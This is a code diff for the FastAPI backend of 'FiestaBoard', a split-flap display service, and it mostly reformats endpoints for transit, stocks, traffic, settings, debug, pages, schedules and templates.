-    limit: int = Query(10, description="Maximum number of results"),
+    limit: int = Query(10, description="Maximum number of results")
 ):
     """
     Find Muni stops near an address.
@@ -4612,8 +4675,14 @@ async def search_muni_stops_by_address(
     try:
         # Geocode address using Nominatim
         geocode_url = "https://nominatim.openstreetmap.org/search"
-        geocode_params = {"q": address, "format": "json", "limit": 1}
-        geocode_headers = {"User-Agent": "FiestaBoard-Service/1.0"}
+        geocode_params = {
+            "q": address,
+            "format": "json",
+            "limit": 1
+        }
+        geocode_headers = {
+            "User-Agent": "FiestaBoard-Service/1.0"
+        }
 
         geocode_response = await asyncio.to_thread(
             requests.get, geocode_url, params=geocode_params, headers=geocode_headers, timeout=10
@@ -4636,14 +4705,14 @@ async def search_muni_stops_by_address(
             "count": stops_data["count"],
             "search_address": address,
             "geocoded_location": {"lat": lat, "lng": lng, "display_name": location.get("display_name", "")},
-            "radius_km": radius,
+            "radius_km": radius
         }
 
     except HTTPException:
         raise
     except requests.exceptions.RequestException as e:
         logger.error(f"Error geocoding address: {e}", exc_info=True)
-        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {e!s}") from e
+        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {str(e)}") from e
     except Exception as e:
         logger.error(f"Error searching Muni stops: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4662,7 +4731,6 @@ async def get_transit_cache_status():
     """
     try:
         from src.utils.transit_cache import get_transit_cache
-
         cache = get_transit_cache()
         status = cache.get_status()
 
@@ -4687,11 +4755,10 @@ async def get_transit_cache_status():
 # Stocks Endpoints
 # =============================================================================
 
-
 @app.get("/stocks/search")
 async def search_stock_symbols(
     query: str = Query(..., description="Search query (symbol or company name)"),
-    limit: int = Query(10, ge=1, le=50, description="Maximum number of results"),
+    limit: int = Query(10, ge=1, le=50, description="Maximum number of results")
 ):
     """
     Search for stock symbols by symbol or company name.
@@ -4713,9 +4780,17 @@ async def search_stock_symbols(
         # Get Finnhub API key if configured
         finnhub_api_key = Config.FINNHUB_API_KEY if Config.FINNHUB_API_KEY else None
 
-        results = StocksSource.search_symbols(query=query, limit=limit, finnhub_api_key=finnhub_api_key)
+        results = StocksSource.search_symbols(
+            query=query,
+            limit=limit,
+            finnhub_api_key=finnhub_api_key
+        )
 
-        return {"symbols": results, "count": len(results), "query": query}
+        return {
+            "symbols": results,
+            "count": len(results),
+            "query": query
+        }
     except Exception as e:
         logger.error(f"Error searching stock symbols: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4747,7 +4822,8 @@ async def validate_stock_symbol(request: dict):
     try:
         from src.utils.stocks import StocksSource
 
-        return StocksSource.validate_symbol(symbol)
+        result = StocksSource.validate_symbol(symbol)
+        return result
     except Exception as e:
         logger.error(f"Error validating stock symbol: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail="Failed to validate stock symbol") from e
@@ -4756,7 +4832,6 @@ async def validate_stock_symbol(request: dict):
 # =============================================================================
 # Traffic Endpoints
 # =============================================================================
-
 
 @app.post("/traffic/routes/geocode")
 async def geocode_address(request: dict):
@@ -4778,8 +4853,14 @@ async def geocode_address(request: dict):
     try:
         # Try Nominatim (free, no key needed)
         geocode_url = "https://nominatim.openstreetmap.org/search"
-        geocode_params = {"q": address, "format": "json", "limit": 1}
-        geocode_headers = {"User-Agent": "FiestaBoard-Service/1.0"}
+        geocode_params = {
+            "q": address,
+            "format": "json",
+            "limit": 1
+        }
+        geocode_headers = {
+            "User-Agent": "FiestaBoard-Service/1.0"
+        }
 
         response = await asyncio.to_thread(
             requests.get, geocode_url, params=geocode_params, headers=geocode_headers, timeout=10
@@ -4794,7 +4875,7 @@ async def geocode_address(request: dict):
         return {
             "lat": float(location["lat"]),
             "lng": float(location["lon"]),
-            "formatted_address": location.get("display_name", address),
+            "formatted_address": location.get("display_name", address)
         }
 
     except HTTPException:
@@ -4828,23 +4909,24 @@ async def validate_traffic_route(request: dict):
         raise HTTPException(status_code=400, detail="origin and destination required")
 
     # Get API key from config
-    api_key = getattr(Config, "GOOGLE_ROUTES_API_KEY", None)
+    api_key = getattr(Config, 'GOOGLE_ROUTES_API_KEY', None)
     if not api_key:
         raise HTTPException(status_code=400, detail="Google Routes API key not configured")
 
     try:
         # Create a temporary TrafficSource to test the route
         # Pass as a list of routes (expected format)
-        routes = [
-            {
-                "origin": origin,
-                "destination": destination,
-                "destination_name": destination_name,
-                "travel_mode": request.get("travel_mode", "DRIVE"),
-            }
-        ]
+        routes = [{
+            "origin": origin,
+            "destination": destination,
+            "destination_name": destination_name,
+            "travel_mode": request.get("travel_mode", "DRIVE")
+        }]
 
-        traffic_source = TrafficSource(api_key=api_key, routes=routes)
+        traffic_source = TrafficSource(
+            api_key=api_key,
+            routes=routes
+        )
 
         # Fetch traffic data to validate (blocking HTTP call - run in thread pool)
         data = await asyncio.to_thread(traffic_source.fetch_traffic_data)
@@ -4852,7 +4934,7 @@ async def validate_traffic_route(request: dict):
         if not data:
             return {
                 "valid": False,
-                "error": "Failed to validate route. This could be due to: 1) Invalid addresses, 2) Google Routes API not enabled, 3) API key issues. Check the API logs for details.",
+                "error": "Failed to validate route. This could be due to: 1) Invalid addresses, 2) Google Routes API not enabled, 3) API key issues. Check the API logs for details."
             }
 
         # Extract coordinates if available
@@ -4867,18 +4949,20 @@ async def validate_traffic_route(request: dict):
             "destination": destination,
             "destination_name": destination_name,
             "origin_coords": origin_coords,
-            "destination_coords": destination_coords,
+            "destination_coords": destination_coords
         }
 
     except Exception as e:
         logger.error(f"Error validating traffic route: {e}", exc_info=True)
-        return {"valid": False, "error": "Failed to validate route"}
+        return {
+            "valid": False,
+            "error": "Failed to validate route"
+        }
 
 
 # =============================================================================
 # Settings Endpoints
 # =============================================================================
-
 
 @app.get("/settings/transitions")
 async def get_transition_settings():
@@ -4889,7 +4973,7 @@ async def get_transition_settings():
         "strategy": transition.strategy,
         "step_interval_ms": transition.step_interval_ms,
         "step_size": transition.step_size,
-        "available_strategies": VALID_STRATEGIES,
+        "available_strategies": VALID_STRATEGIES
     }
 
 
@@ -4912,10 +4996,15 @@ async def update_transition_settings(request: dict):
         step_size = request.get("step_size", ...)
 
         transition = settings_service.update_transition_settings(
-            strategy=strategy, step_interval_ms=step_interval_ms, step_size=step_size
+            strategy=strategy,
+            step_interval_ms=step_interval_ms,
+            step_size=step_size
         )
 
-        return {"status": "success", "settings": transition.to_dict()}
+        return {
+            "status": "success",
+            "settings": transition.to_dict()
+        }
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -4925,7 +5014,11 @@ async def get_output_settings():
     """Get current output target settings."""
     settings_service = get_settings_service()
     output = settings_service.get_output_settings()
-    return {"target": output.target, "effective_target": output.target, "available_targets": VALID_OUTPUT_TARGETS}
+    return {
+        "target": output.target,
+        "effective_target": output.target,
+        "available_targets": VALID_OUTPUT_TARGETS
+    }
 
 
 @app.put("/settings/output")
@@ -4943,7 +5036,10 @@ async def update_output_settings(request: dict):
 
     try:
         output = settings_service.set_output_target(request["target"])
-        return {"status": "success", "settings": output.to_dict()}
+        return {
+            "status": "success",
+            "settings": output.to_dict()
+        }
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -4953,7 +5049,9 @@ async def get_active_page():
     """Get the currently active page ID."""
     settings_service = get_settings_service()
     page_id = settings_service.get_active_page_id()
-    return {"page_id": page_id}
+    return {
+        "page_id": page_id
+    }
 
 
 @app.put("/settings/active-page")
@@ -4995,7 +5093,6 @@ async def set_active_page(request: dict):
     # would silently overwrite the user's selection. See issue #856.
     if PLUGIN_SYSTEM_AVAILABLE:
         from .triggers.service import get_trigger_service
-
         get_trigger_service().dismiss_active_for_user_override()
 
     # Set the active page (stores the carousel ID or page ID as-is)
@@ -5008,19 +5105,16 @@ async def set_active_page(request: dict):
         if result and result.available:
             system_transition = settings_service.get_transition_settings()
             strategy = page.transition_strategy if page.transition_strategy else system_transition.strategy
-            interval_ms = (
-                page.transition_interval_ms
-                if page.transition_interval_ms is not None
-                else system_transition.step_interval_ms
-            )
-            step_size = (
-                page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
-            )
+            interval_ms = page.transition_interval_ms if page.transition_interval_ms is not None else system_transition.step_interval_ms
+            step_size = page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
 
             dims = get_dimensions(page.device_type)
             board_array = text_to_board_array(result.formatted, rows=dims.rows, cols=dims.cols)
             success, was_sent = service.vb_client.send_characters(
-                board_array, strategy=strategy, step_interval_ms=interval_ms, step_size=step_size
+                board_array,
+                strategy=strategy,
+                step_interval_ms=interval_ms,
+                step_size=step_size
             )
             sent_to_board = was_sent
             if not success:
@@ -5107,8 +5201,9 @@ async def set_temporary_override(request: dict):
     if revert_mode == "page":
         if not revert_page_id:
             raise HTTPException(status_code=422, detail="revert_page_id is required when revert_mode is 'page'")
-        if not is_carousel_id(revert_page_id) and not page_service.get_page(revert_page_id):
-            raise HTTPException(status_code=404, detail=f"Revert page not found: {revert_page_id}")
+        if not is_carousel_id(revert_page_id):
+            if not page_service.get_page(revert_page_id):
+                raise HTTPException(status_code=404, detail=f"Revert page not found: {revert_page_id}")
 
     expires_at = (datetime.now(UTC) + timedelta(minutes=duration_minutes)).isoformat()
     override = TemporaryOverride(
@@ -5341,7 +5436,6 @@ async def get_location_sun_times(date: str | None = None):
             target_date = date_cls.fromisoformat(date)
         except ValueError:
             from fastapi import HTTPException
-
             raise HTTPException(status_code=400, detail="Invalid date format. Use YYYY-MM-DD.") from None
     else:
         target_date = get_today_in_timezone(timezone_str)
@@ -5384,7 +5478,6 @@ async def get_location_sun_times_week(week_start: str):
         start = date_cls.fromisoformat(week_start)
     except ValueError:
         from fastapi import HTTPException
-
         raise HTTPException(status_code=400, detail="Invalid week_start format. Use YYYY-MM-DD.") from None
 
     result: dict = {}
@@ -5463,7 +5556,7 @@ async def update_beta_settings(request: dict):
             # persisting the user's preference, but we surface the error.
             try:
                 await asyncio.to_thread(https_certs.generate_cert)
-            except Exception as e:
+            except Exception as e:  # noqa: BLE001 - report to caller
                 logger.error("Failed to generate HTTPS certificate: %s", e)
                 cert_error = str(e)
         elif previous and not requested:
@@ -5471,7 +5564,7 @@ async def update_beta_settings(request: dict):
             # falls back to HTTP on next restart.
             try:
                 await asyncio.to_thread(https_certs.remove_cert)
-            except Exception as e:
+            except Exception as e:  # noqa: BLE001
                 logger.warning("Failed to remove HTTPS certificate: %s", e)
 
     updated = settings_service.update_beta_settings(request or {})
@@ -5560,17 +5653,15 @@ async def get_all_settings():
         "plugins": plugins.to_dict(),
         "status": {
             "running": _service_running,
-        },
+        }
     }
 
 
 # ==================== Debug Endpoints ====================
 
-
 def _get_server_ip() -> str:
     """Get the server's IP address."""
     import socket
-
     try:
         # Create a socket to determine the IP
         s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@@ -5626,7 +5717,10 @@ async def debug_blank_board():
 
     settings_service = get_settings_service()
     if not settings_service.should_send_to_board():
-        return {"status": "success", "message": "Board blank (output target is UI only)"}
+        return {
+            "status": "success",
+            "message": "Board blank (output target is UI only)"
+        }
 
     try:
         # Create a 6x22 array filled with spaces (code 0)
@@ -5634,8 +5728,12 @@ async def debug_blank_board():
         success, was_sent = client.send_characters(blank_array, force=True)
 
         if success:
-            return {"status": "success", "message": "Board blanked successfully"}
-        raise HTTPException(status_code=500, detail="Failed to blank board")
+            return {
+                "status": "success",
+                "message": "Board blanked successfully"
+            }
+        else:
+            raise HTTPException(status_code=500, detail="Failed to blank board")
     except Exception as e:
         logger.error(f"Error blanking board: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5662,7 +5760,7 @@ async def debug_fill_board(request: dict):
     if not settings_service.should_send_to_board():
         return {
             "status": "success",
-            "message": f"Board filled with character {character_code} (output target is UI only)",
+            "message": f"Board filled with character {character_code} (output target is UI only)"
         }
 
     try:
@@ -5671,8 +5769,12 @@ async def debug_fill_board(request: dict):
         success, was_sent = client.send_characters(fill_array, force=True)
 
         if success:
-            return {"status": "success", "message": f"Board filled with character {character_code}"}
-        raise HTTPException(status_code=500, detail="Failed to fill board")
+            return {
+                "status": "success",
+                "message": f"Board filled with character {character_code}"
+            }
+        else:
+            raise HTTPException(status_code=500, detail="Failed to fill board")
     except Exception as e:
         logger.error(f"Error filling board: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5698,7 +5800,6 @@ async def debug_show_info():
 
     # Get current timestamp
     from .time_service import get_time_service
-
     time_service = get_time_service()
     now = time_service.get_current_time()
     timestamp = now.strftime("%H:%M")
@@ -5715,20 +5816,24 @@ V{version[:7]} {timestamp}"""
         return {
             "status": "success",
             "message": "Debug info displayed (output target is UI only)",
-            "debug_info": debug_text,
+            "debug_info": debug_text
         }
 
     try:
         # Convert text to board array
         from .text_to_board import text_to_board_array
-
         board_array = text_to_board_array(debug_text, use_color_tiles=False)
 
         success, was_sent = client.send_characters(board_array, force=True)
 
         if success:
-            return {"status": "success", "message": "Debug info sent to board", "debug_info": debug_text}
-        raise HTTPException(status_code=500, detail="Failed to send debug info")
+            return {
+                "status": "success",
+                "message": "Debug info sent to board",
+                "debug_info": debug_text
+            }
+        else:
+            raise HTTPException(status_code=500, detail="Failed to send debug info")
     except Exception as e:
         logger.error(f"Error sending debug info: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5751,12 +5856,23 @@ async def debug_test_connection():
                 "status": "success",
                 "message": f"Connection successful (latency: {latency}ms)",
                 "connected": True,
-                "latency_ms": latency,
+                "latency_ms": latency
             }
-        return {"status": "error", "message": "Connection failed", "connected": False, "latency_ms": None}
+        else:
+            return {
+                "status": "error",
+                "message": "Connection failed",
+                "connected": False,
+                "latency_ms": None
+            }
     except Exception as e:
         logger.error(f"Error testing connection: {e}", exc_info=True)
-        return {"status": "error", "message": "Connection test failed", "connected": False, "latency_ms": None}
+        return {
+            "status": "error",
+            "message": "Connection test failed",
+            "connected": False,
+            "latency_ms": None
+        }
 
 
 @app.post("/debug/clear-cache")
@@ -5768,7 +5884,10 @@ async def debug_clear_cache():
 
     try:
         client.clear_cache()
-        return {"status": "success", "message": "Cache cleared - next message will be sent regardless of content"}
+        return {
+            "status": "success",
+            "message": "Cache cleared - next message will be sent regardless of content"
+        }
     except Exception as e:
         logger.error(f"Error clearing cache: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5783,7 +5902,10 @@ async def debug_get_cache_status():
 
     try:
         cache_status = client.get_cache_status()
-        return {"status": "success", "cache": cache_status}
+        return {
+            "status": "success",
+            "cache": cache_status
+        }
     except Exception as e:
         logger.error(f"Error getting cache status: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5802,7 +5924,6 @@ async def debug_get_system_info():
 
     # Get current timestamp
     from .time_service import get_time_service
-
     time_service = get_time_service()
     timestamp = time_service.create_utc_timestamp()
 
@@ -5811,13 +5932,10 @@ async def debug_get_system_info():
     cache_status = client.get_cache_status() if client else None
 
     # Check if board is configured
-    board_configured = bool(
-        board_ip
-        and (
-            (connection_mode == "local" and Config.BOARD_LOCAL_API_KEY)
-            or (connection_mode == "cloud" and Config.BOARD_READ_WRITE_KEY)
-        )
-    )
+    board_configured = bool(board_ip and (
+        (connection_mode == "local" and Config.BOARD_LOCAL_API_KEY) or
+        (connection_mode == "cloud" and Config.BOARD_READ_WRITE_KEY)
+    ))
 
     return {
         "board_ip": board_ip,
@@ -5865,14 +5983,16 @@ async def debug_network_diagnostics():
 # Pages Endpoints
 # =============================================================================
 
-
 @app.get("/pages")
 async def list_pages():
     """List all saved pages."""
     page_service = get_page_service()
     pages = page_service.list_pages()
 
-    return {"pages": [p.model_dump() for p in pages], "total": len(pages)}
+    return {
+        "pages": [p.model_dump() for p in pages],
+        "total": len(pages)
+    }
 
 
 @app.get("/pages/current-display")
@@ -5893,7 +6013,6 @@ async def get_current_display():
     # Determine the active page ID (schedule-aware)
     if settings_service.is_schedule_enabled():
         from .time_service import get_time_service
-
         time_service = get_time_service()
         now = time_service.get_current_time()
         current_time = now.time()
@@ -5927,7 +6046,11 @@ async def get_current_display():
     if page.type == "template" and page.template:
         # Return raw template so variables like {{weather.temp}} are preserved
         response["template"] = page.template
-        response["line_metadata"] = [m.model_dump() for m in page.line_metadata] if page.line_metadata else None
+        response["line_metadata"] = (
+            [m.model_dump() for m in page.line_metadata]
+            if page.line_metadata
+            else None
+        )
     else:
         # For single/composite pages, return the rendered output as template lines
         result = page_service.preview_page(active_page_id, force_refresh=True)
@@ -5955,7 +6078,10 @@ async def create_page(page_data: PageCreate):
 
     try:
         page = page_service.create_page(page_data)
-        return {"status": "success", "page": page.model_dump()}
+        return {
+            "status": "success",
+            "page": page.model_dump()
+        }
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -5982,7 +6108,10 @@ async def update_page(page_id: str, page_data: PageUpdate):
         if not page:
             raise HTTPException(status_code=404, detail=f"Page not found: {page_id}")
 
-        return {"status": "success", "page": page.model_dump()}
+        return {
+            "status": "success",
+            "page": page.model_dump()
+        }
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -6071,7 +6200,7 @@ _STAFF_PICKS_PATH = Path(__file__).parent.parent / "staff-picks" / "picks.json"
 
 def _load_staff_picks() -> list:
     try:
-        with _STAFF_PICKS_PATH.open() as f:
+        with open(_STAFF_PICKS_PATH) as f:
             return json.load(f)
     except FileNotFoundError:
         return []
@@ -6081,7 +6210,11 @@ def _load_staff_picks() -> list:
 async def list_staff_picks():
     """Return all staff picks (without share strings)."""
     picks = _load_staff_picks()
-    return [{k: v for k, v in pick.items() if k != "share_string"} for pick in picks]
+    return [
+        {k: v for k, v in pick.items() if k != "share_string"}
+        for pick in picks
+    ]
+
 
 
 @app.get("/staff-picks/{pick_id}/share")
@@ -6096,7 +6229,8 @@ async def get_staff_pick_share(pick_id: str):
 
 @app.post("/pages/{page_id}/preview")
 async def preview_page(
-    page_id: str, force_refresh: bool = Query(default=False, description="Force fresh render, bypass cache")
+    page_id: str,
+    force_refresh: bool = Query(default=False, description="Force fresh render, bypass cache")
 ):
     """
     Preview a page's rendered output.
@@ -6130,9 +6264,9 @@ async def preview_page(
     return {
         "page_id": page_id,
         "message": result.formatted,
-        "lines": result.formatted.split("\n"),
+        "lines": result.formatted.split('\n'),
         "display_type": result.display_type,
-        "raw": result.raw,
+        "raw": result.raw
     }
 
 
@@ -6173,23 +6307,29 @@ async def preview_pages_batch(request: dict):
     for page_id in page_ids:
         result = batch_results.get(page_id)
         if result is None:
-            results[page_id] = {"error": "Page not found", "available": False}
+            results[page_id] = {
+                "error": "Page not found",
+                "available": False
+            }
         elif not result.available:
-            results[page_id] = {"error": result.error or "Page rendering failed", "available": False}
+            results[page_id] = {
+                "error": result.error or "Page rendering failed",
+                "available": False
+            }
         else:
             results[page_id] = {
                 "page_id": page_id,
                 "message": result.formatted,
-                "lines": result.formatted.split("\n"),
+                "lines": result.formatted.split('\n'),
                 "display_type": result.display_type,
                 "raw": result.raw,
-                "available": True,
+                "available": True
             }
 
     return {
         "previews": results,
         "total": len(page_ids),
-        "successful": sum(1 for r in results.values() if r.get("available", False)),
+        "successful": sum(1 for r in results.values() if r.get("available", False))
     }
 
 
@@ -6206,7 +6346,7 @@ async def get_page_cache_stats():
 
 
 @app.post("/pages/cache/clear")
-async def clear_page_cache(request: dict | None = None):
+async def clear_page_cache(request: dict = None):
     """
     Clear preview cache.
 
@@ -6227,8 +6367,15 @@ async def clear_page_cache(request: dict | None = None):
     page_service._invalidate_cache(page_id)
 
     if page_id:
-        return {"status": "success", "message": f"Cache cleared for page {page_id}"}
-    return {"status": "success", "message": "All preview caches cleared"}
+        return {
+            "status": "success",
+            "message": f"Cache cleared for page {page_id}"
+        }
+    else:
+        return {
+            "status": "success",
+            "message": "All preview caches cleared"
+        }
 
 
 @app.post("/pages/{page_id}/send")
@@ -6241,7 +6388,10 @@ async def send_page(page_id: str, target: str | None = None):
         target: Override output target (ui, board, both)
     """
     if target is not None and target not in VALID_OUTPUT_TARGETS:
-        raise HTTPException(status_code=400, detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}")
+        raise HTTPException(
+            status_code=400,
+            detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}"
+        )
 
     page_service = get_page_service()
     settings_service = get_settings_service()
@@ -6281,20 +6431,17 @@ async def send_page(page_id: str, target: str | None = None):
             # Use page-level transitions if set, otherwise fall back to system defaults
             system_transition = settings_service.get_transition_settings()
             strategy = page.transition_strategy if page.transition_strategy else system_transition.strategy
-            interval_ms = (
-                page.transition_interval_ms
-                if page.transition_interval_ms is not None
-                else system_transition.step_interval_ms
-            )
-            step_size = (
-                page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
-            )
+            interval_ms = page.transition_interval_ms if page.transition_interval_ms is not None else system_transition.step_interval_ms
+            step_size = page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
 
             # Convert to board array with dimensions for page's device type (flagship vs note)
             dims = get_dimensions(page.device_type)
             board_array = text_to_board_array(result.formatted, rows=dims.rows, cols=dims.cols)
             success, was_sent = service.vb_client.send_characters(
-                board_array, strategy=strategy, step_interval_ms=interval_ms, step_size=step_size
+                board_array,
+                strategy=strategy,
+                step_interval_ms=interval_ms,
+                step_size=step_size
             )
             sent_to_board = was_sent
             if not success:
@@ -6314,7 +6461,6 @@ async def send_page(page_id: str, target: str | None = None):
 # =============================================================================
 # Schedule Endpoints
 # =============================================================================
-
 
 def _enrich_schedule_with_sun_times(schedule_dict: dict) -> dict:
     """Add resolved_start_time / resolved_end_time to a schedule dict.
@@ -6356,7 +6502,6 @@ def _enrich_schedule_with_sun_times(schedule_dict: dict) -> dict:
     schedule_dict["resolved_start_time"] = resolved_start
     schedule_dict["resolved_end_time"] = resolved_end
     return schedule_dict
-
 
 @app.get("/schedules")
 async def list_schedules(board_id: str | None = None):
@@ -6407,7 +6552,6 @@ async def create_schedule(schedule_data: ScheduleCreate):
 # Specific routes must come BEFORE parameterized routes
 # to avoid /schedules/{schedule_id} matching everything
 
-
 @app.get("/schedules/active/page")
 async def get_active_schedule(board_id: str | None = None):
     """Get the currently active page based on schedule (optional query: board_id=)."""
@@ -6434,7 +6578,6 @@ async def get_active_schedule(board_id: str | None = None):
             "temporary_override": temporary_override_payload,
         }
     from .time_service import get_time_service
-
     time_service = get_time_service()
     now = time_service.get_current_time()
     current_time = now.time()
@@ -6515,7 +6658,6 @@ async def set_schedule_enabled(request: dict):
 
 # Parameterized routes come LAST to avoid matching specific paths
 
-
 @app.get("/schedules/{schedule_id}")
 async def get_schedule(schedule_id: str):
     """Get a schedule entry by ID.
@@ -6573,13 +6715,15 @@ async def delete_schedule(schedule_id: str):
     if not deleted:
         raise HTTPException(status_code=404, detail=f"Schedule not found: {schedule_id}")
 
-    return {"status": "success", "message": f"Schedule {schedule_id} deleted"}
+    return {
+        "status": "success",
+        "message": f"Schedule {schedule_id} deleted"
+    }
 
 
 # =============================================================================
 # Carousel Endpoints
 # =============================================================================
-
 
 @app.get("/carousels")
 async def list_carousels():
@@ -6653,7 +6797,6 @@ async def delete_carousel(carousel_id: str):
 # Template Endpoints
 # =============================================================================
 
-
 @app.get("/templates/variables")
 async def get_template_variables():
     """
@@ -6667,7 +6810,7 @@ async def get_template_variables():
     template_engine = get_template_engine()
     registry = get_plugin_registry()
 
-    return {
+    result = {
         "variables": template_engine.get_available_variables(),
         "max_lengths": template_engine.get_variable_max_lengths(),
         "variable_metadata": registry.get_all_variables_with_metadata(),
@@ -6687,12 +6830,12 @@ async def get_template_variables():
         "formatting": {
             "fill_space": {
                 "syntax": "{{fill_space}}",
-                "description": "Expands to fill remaining space on the line. Use multiple for multi-column layouts.",
+                "description": "Expands to fill remaining space on the line. Use multiple for multi-column layouts."
             },
             "fill_space_repeat": {
                 "syntax": "{{fill_space_repeat:pattern}}",
-                "description": "Fills remaining space with repeating colors or characters. Examples: {{fill_space_repeat:red}} or {{fill_space_repeat:-}}",
-            },
+                "description": "Fills remaining space with repeating colors or characters. Examples: {{fill_space_repeat:red}} or {{fill_space_repeat:-}}"
+            }
         },
         "syntax_examples": {
             "variable": "{{weather.temperature}}",
@@ -6703,8 +6846,9 @@ async def get_template_variables():
             "wrap": "{{star_trek.quote|wrap}}",
             "fill_space": "Left{{fill_space}}Right",
             "fill_space_three_columns": "A{{fill_space}}B{{fill_space}}C",
-        },
+        }
     }
+    return result
 
 
 @app.post("/templates/validate")
@@ -6724,14 +6868,17 @@ async def validate_template(request: dict):
 
     # Handle both string and list input
     if isinstance(template, list):
-        template = "\n".join(template)
+        template = '\n'.join(template)
 
     template_engine = get_template_engine()
     errors = template_engine.validate_template(template)
 
     return {
         "valid": len(errors) == 0,
-        "errors": [{"line": e.line, "column": e.column, "message": e.message} for e in errors],
+        "errors": [
+            {"line": e.line, "column": e.column, "message": e.message}
+            for e in errors
+        ]
     }
 
 
@@ -6766,16 +6913,24 @@ async def render_template(request: dict):
 
     # Determine line count from device type
     from .devices import DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS
-
-    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
+    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE,
+                                  DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
     num_rows = dims.rows
 
     # Early return for empty templates to avoid unnecessary processing
     if isinstance(template, list):
         if not template or all(not line.strip() for line in template):
-            return {"rendered": "\n".join([""] * num_rows), "lines": [""] * num_rows, "line_count": num_rows}
+            return {
+                "rendered": "\n".join([""] * num_rows),
+                "lines": [""] * num_rows,
+                "line_count": num_rows
+            }
     elif isinstance(template, str) and not template.strip():
-        return {"rendered": "\n".join([""] * num_rows), "lines": [""] * num_rows, "line_count": num_rows}
+        return {
+            "rendered": "\n".join([""] * num_rows),
+            "lines": [""] * num_rows,
+            "line_count": num_rows
+        }
 
     template_engine = get_template_engine()
     line_metadata = request.get("line_metadata")
@@ -6788,10 +6943,14 @@ async def render_template(request: dict):
             logger.info(f"Rendering template string: {template}")
             rendered = template_engine.render(template)
 
-        return {"rendered": rendered, "lines": rendered.split("\n"), "line_count": len(rendered.split("\n"))}
+        return {
+            "rendered": rendered,
+            "lines": rendered.split('\n'),
+            "line_count": len(rendered.split('\n'))
+        }
     except Exception as e:
         logger.error(f"Template rendering error: {e}", exc_info=True)
-        raise HTTPException(status_code=400, detail=f"Template rendering failed: {e!s}") from e
+        raise HTTPException(status_code=400, detail=f"Template rendering failed: {str(e)}") from e
 
 
 @app.post("/templates/render/live")
@@ -6818,8 +6977,8 @@ async def render_template_live(request: dict):
 
     # Determine line count from device type
     from .devices import DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS
-
-    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE, DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
+    dims = DEVICE_DIMENSIONS.get(device_type or DEFAULT_DEVICE_TYPE,
+                                  DEVICE_DIMENSIONS[DEFAULT_DEVICE_TYPE])
     num_rows = dims.rows
 
     # Render the template
@@ -6846,7 +7005,7 @@ async def render_template_live(request: dict):
             rendered = template_engine.render(template)
     except Exception as e:
         logger.error(f"Template rendering error: {e}", exc_info=True)
-        raise HTTPException(status_code=400, detail=f"Template rendering failed: {e!s}") from e
+        raise HTTPException(status_code=400, detail=f"Template rendering failed: {str(e)}") from e
 
     # Find the target board
     board_settings = settings_service.get_board_settings()
@@ -6887,8 +7046,8 @@ async def render_template_live(request: dict):
 
     return {
         "rendered": rendered,
-        "lines": rendered.split("\n"),
-        "line_count": len(rendered.split("\n")),
+        "lines": rendered.split('\n'),
+        "line_count": len(rendered.split('\n')),
         "sent_to_board": sent_to_board,
         "board_id": target_board.get("id") if target_board else None,
     }
@@ -6920,6 +7079,7 @@ async def clear_cache():
     return {"status": "success", "message": "Cache cleared - next update will be sent to board"}
 
 
+
 @app.post("/force-refresh")
 async def force_refresh():
     """
@@ -6941,13 +7101,12 @@ async def force_refresh():
         return {"status": "success", "message": "Display force-refreshed successfully"}
     except Exception as e:
         logger.error(f"Error force-refreshing display: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to force refresh: {e!s}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to force refresh: {str(e)}") from e
 
 
 # =============================================================================
 # Home Assistant Endpoints
 # =============================================================================
-
 
 @app.get("/home-assistant/entities")
 async def get_home_assistant_entities():
@@ -6978,17 +7137,15 @@ async def get_home_assistant_entities():
         result_entities = []
         for e in entities:
             attrs = e.get("attributes") or {}
-            result_entities.append(
-                {
-                    "entity_id": e["entity_id"],
-                    "state": e["state"],
-                    "attributes": attrs,
-                    "friendly_name": attrs.get("friendly_name", e["entity_id"]),
-                }
-            )
+            result_entities.append({
+                "entity_id": e["entity_id"],
+                "state": e["state"],
+                "attributes": attrs,
+                "friendly_name": attrs.get("friendly_name", e["entity_id"]),
+            })
         return {"entities": result_entities}
     except Exception as e:
-        raise HTTPException(status_code=503, detail=f"Failed to fetch entities: {e!s}") from e
+        raise HTTPException(status_code=503, detail=f"Failed to fetch entities: {str(e)}") from e
 
 
 # Legacy endpoints /preview and /publish-preview have been removed.
@@ -7003,7 +7160,6 @@ async def get_home_assistant_entities():
 # Import plugin system
 try:
     from .plugins import get_plugin_registry
-
     PLUGIN_SYSTEM_AVAILABLE = True
 except ImportError:
     PLUGIN_SYSTEM_AVAILABLE = False
@@ -7012,13 +7168,11 @@ except ImportError:
 
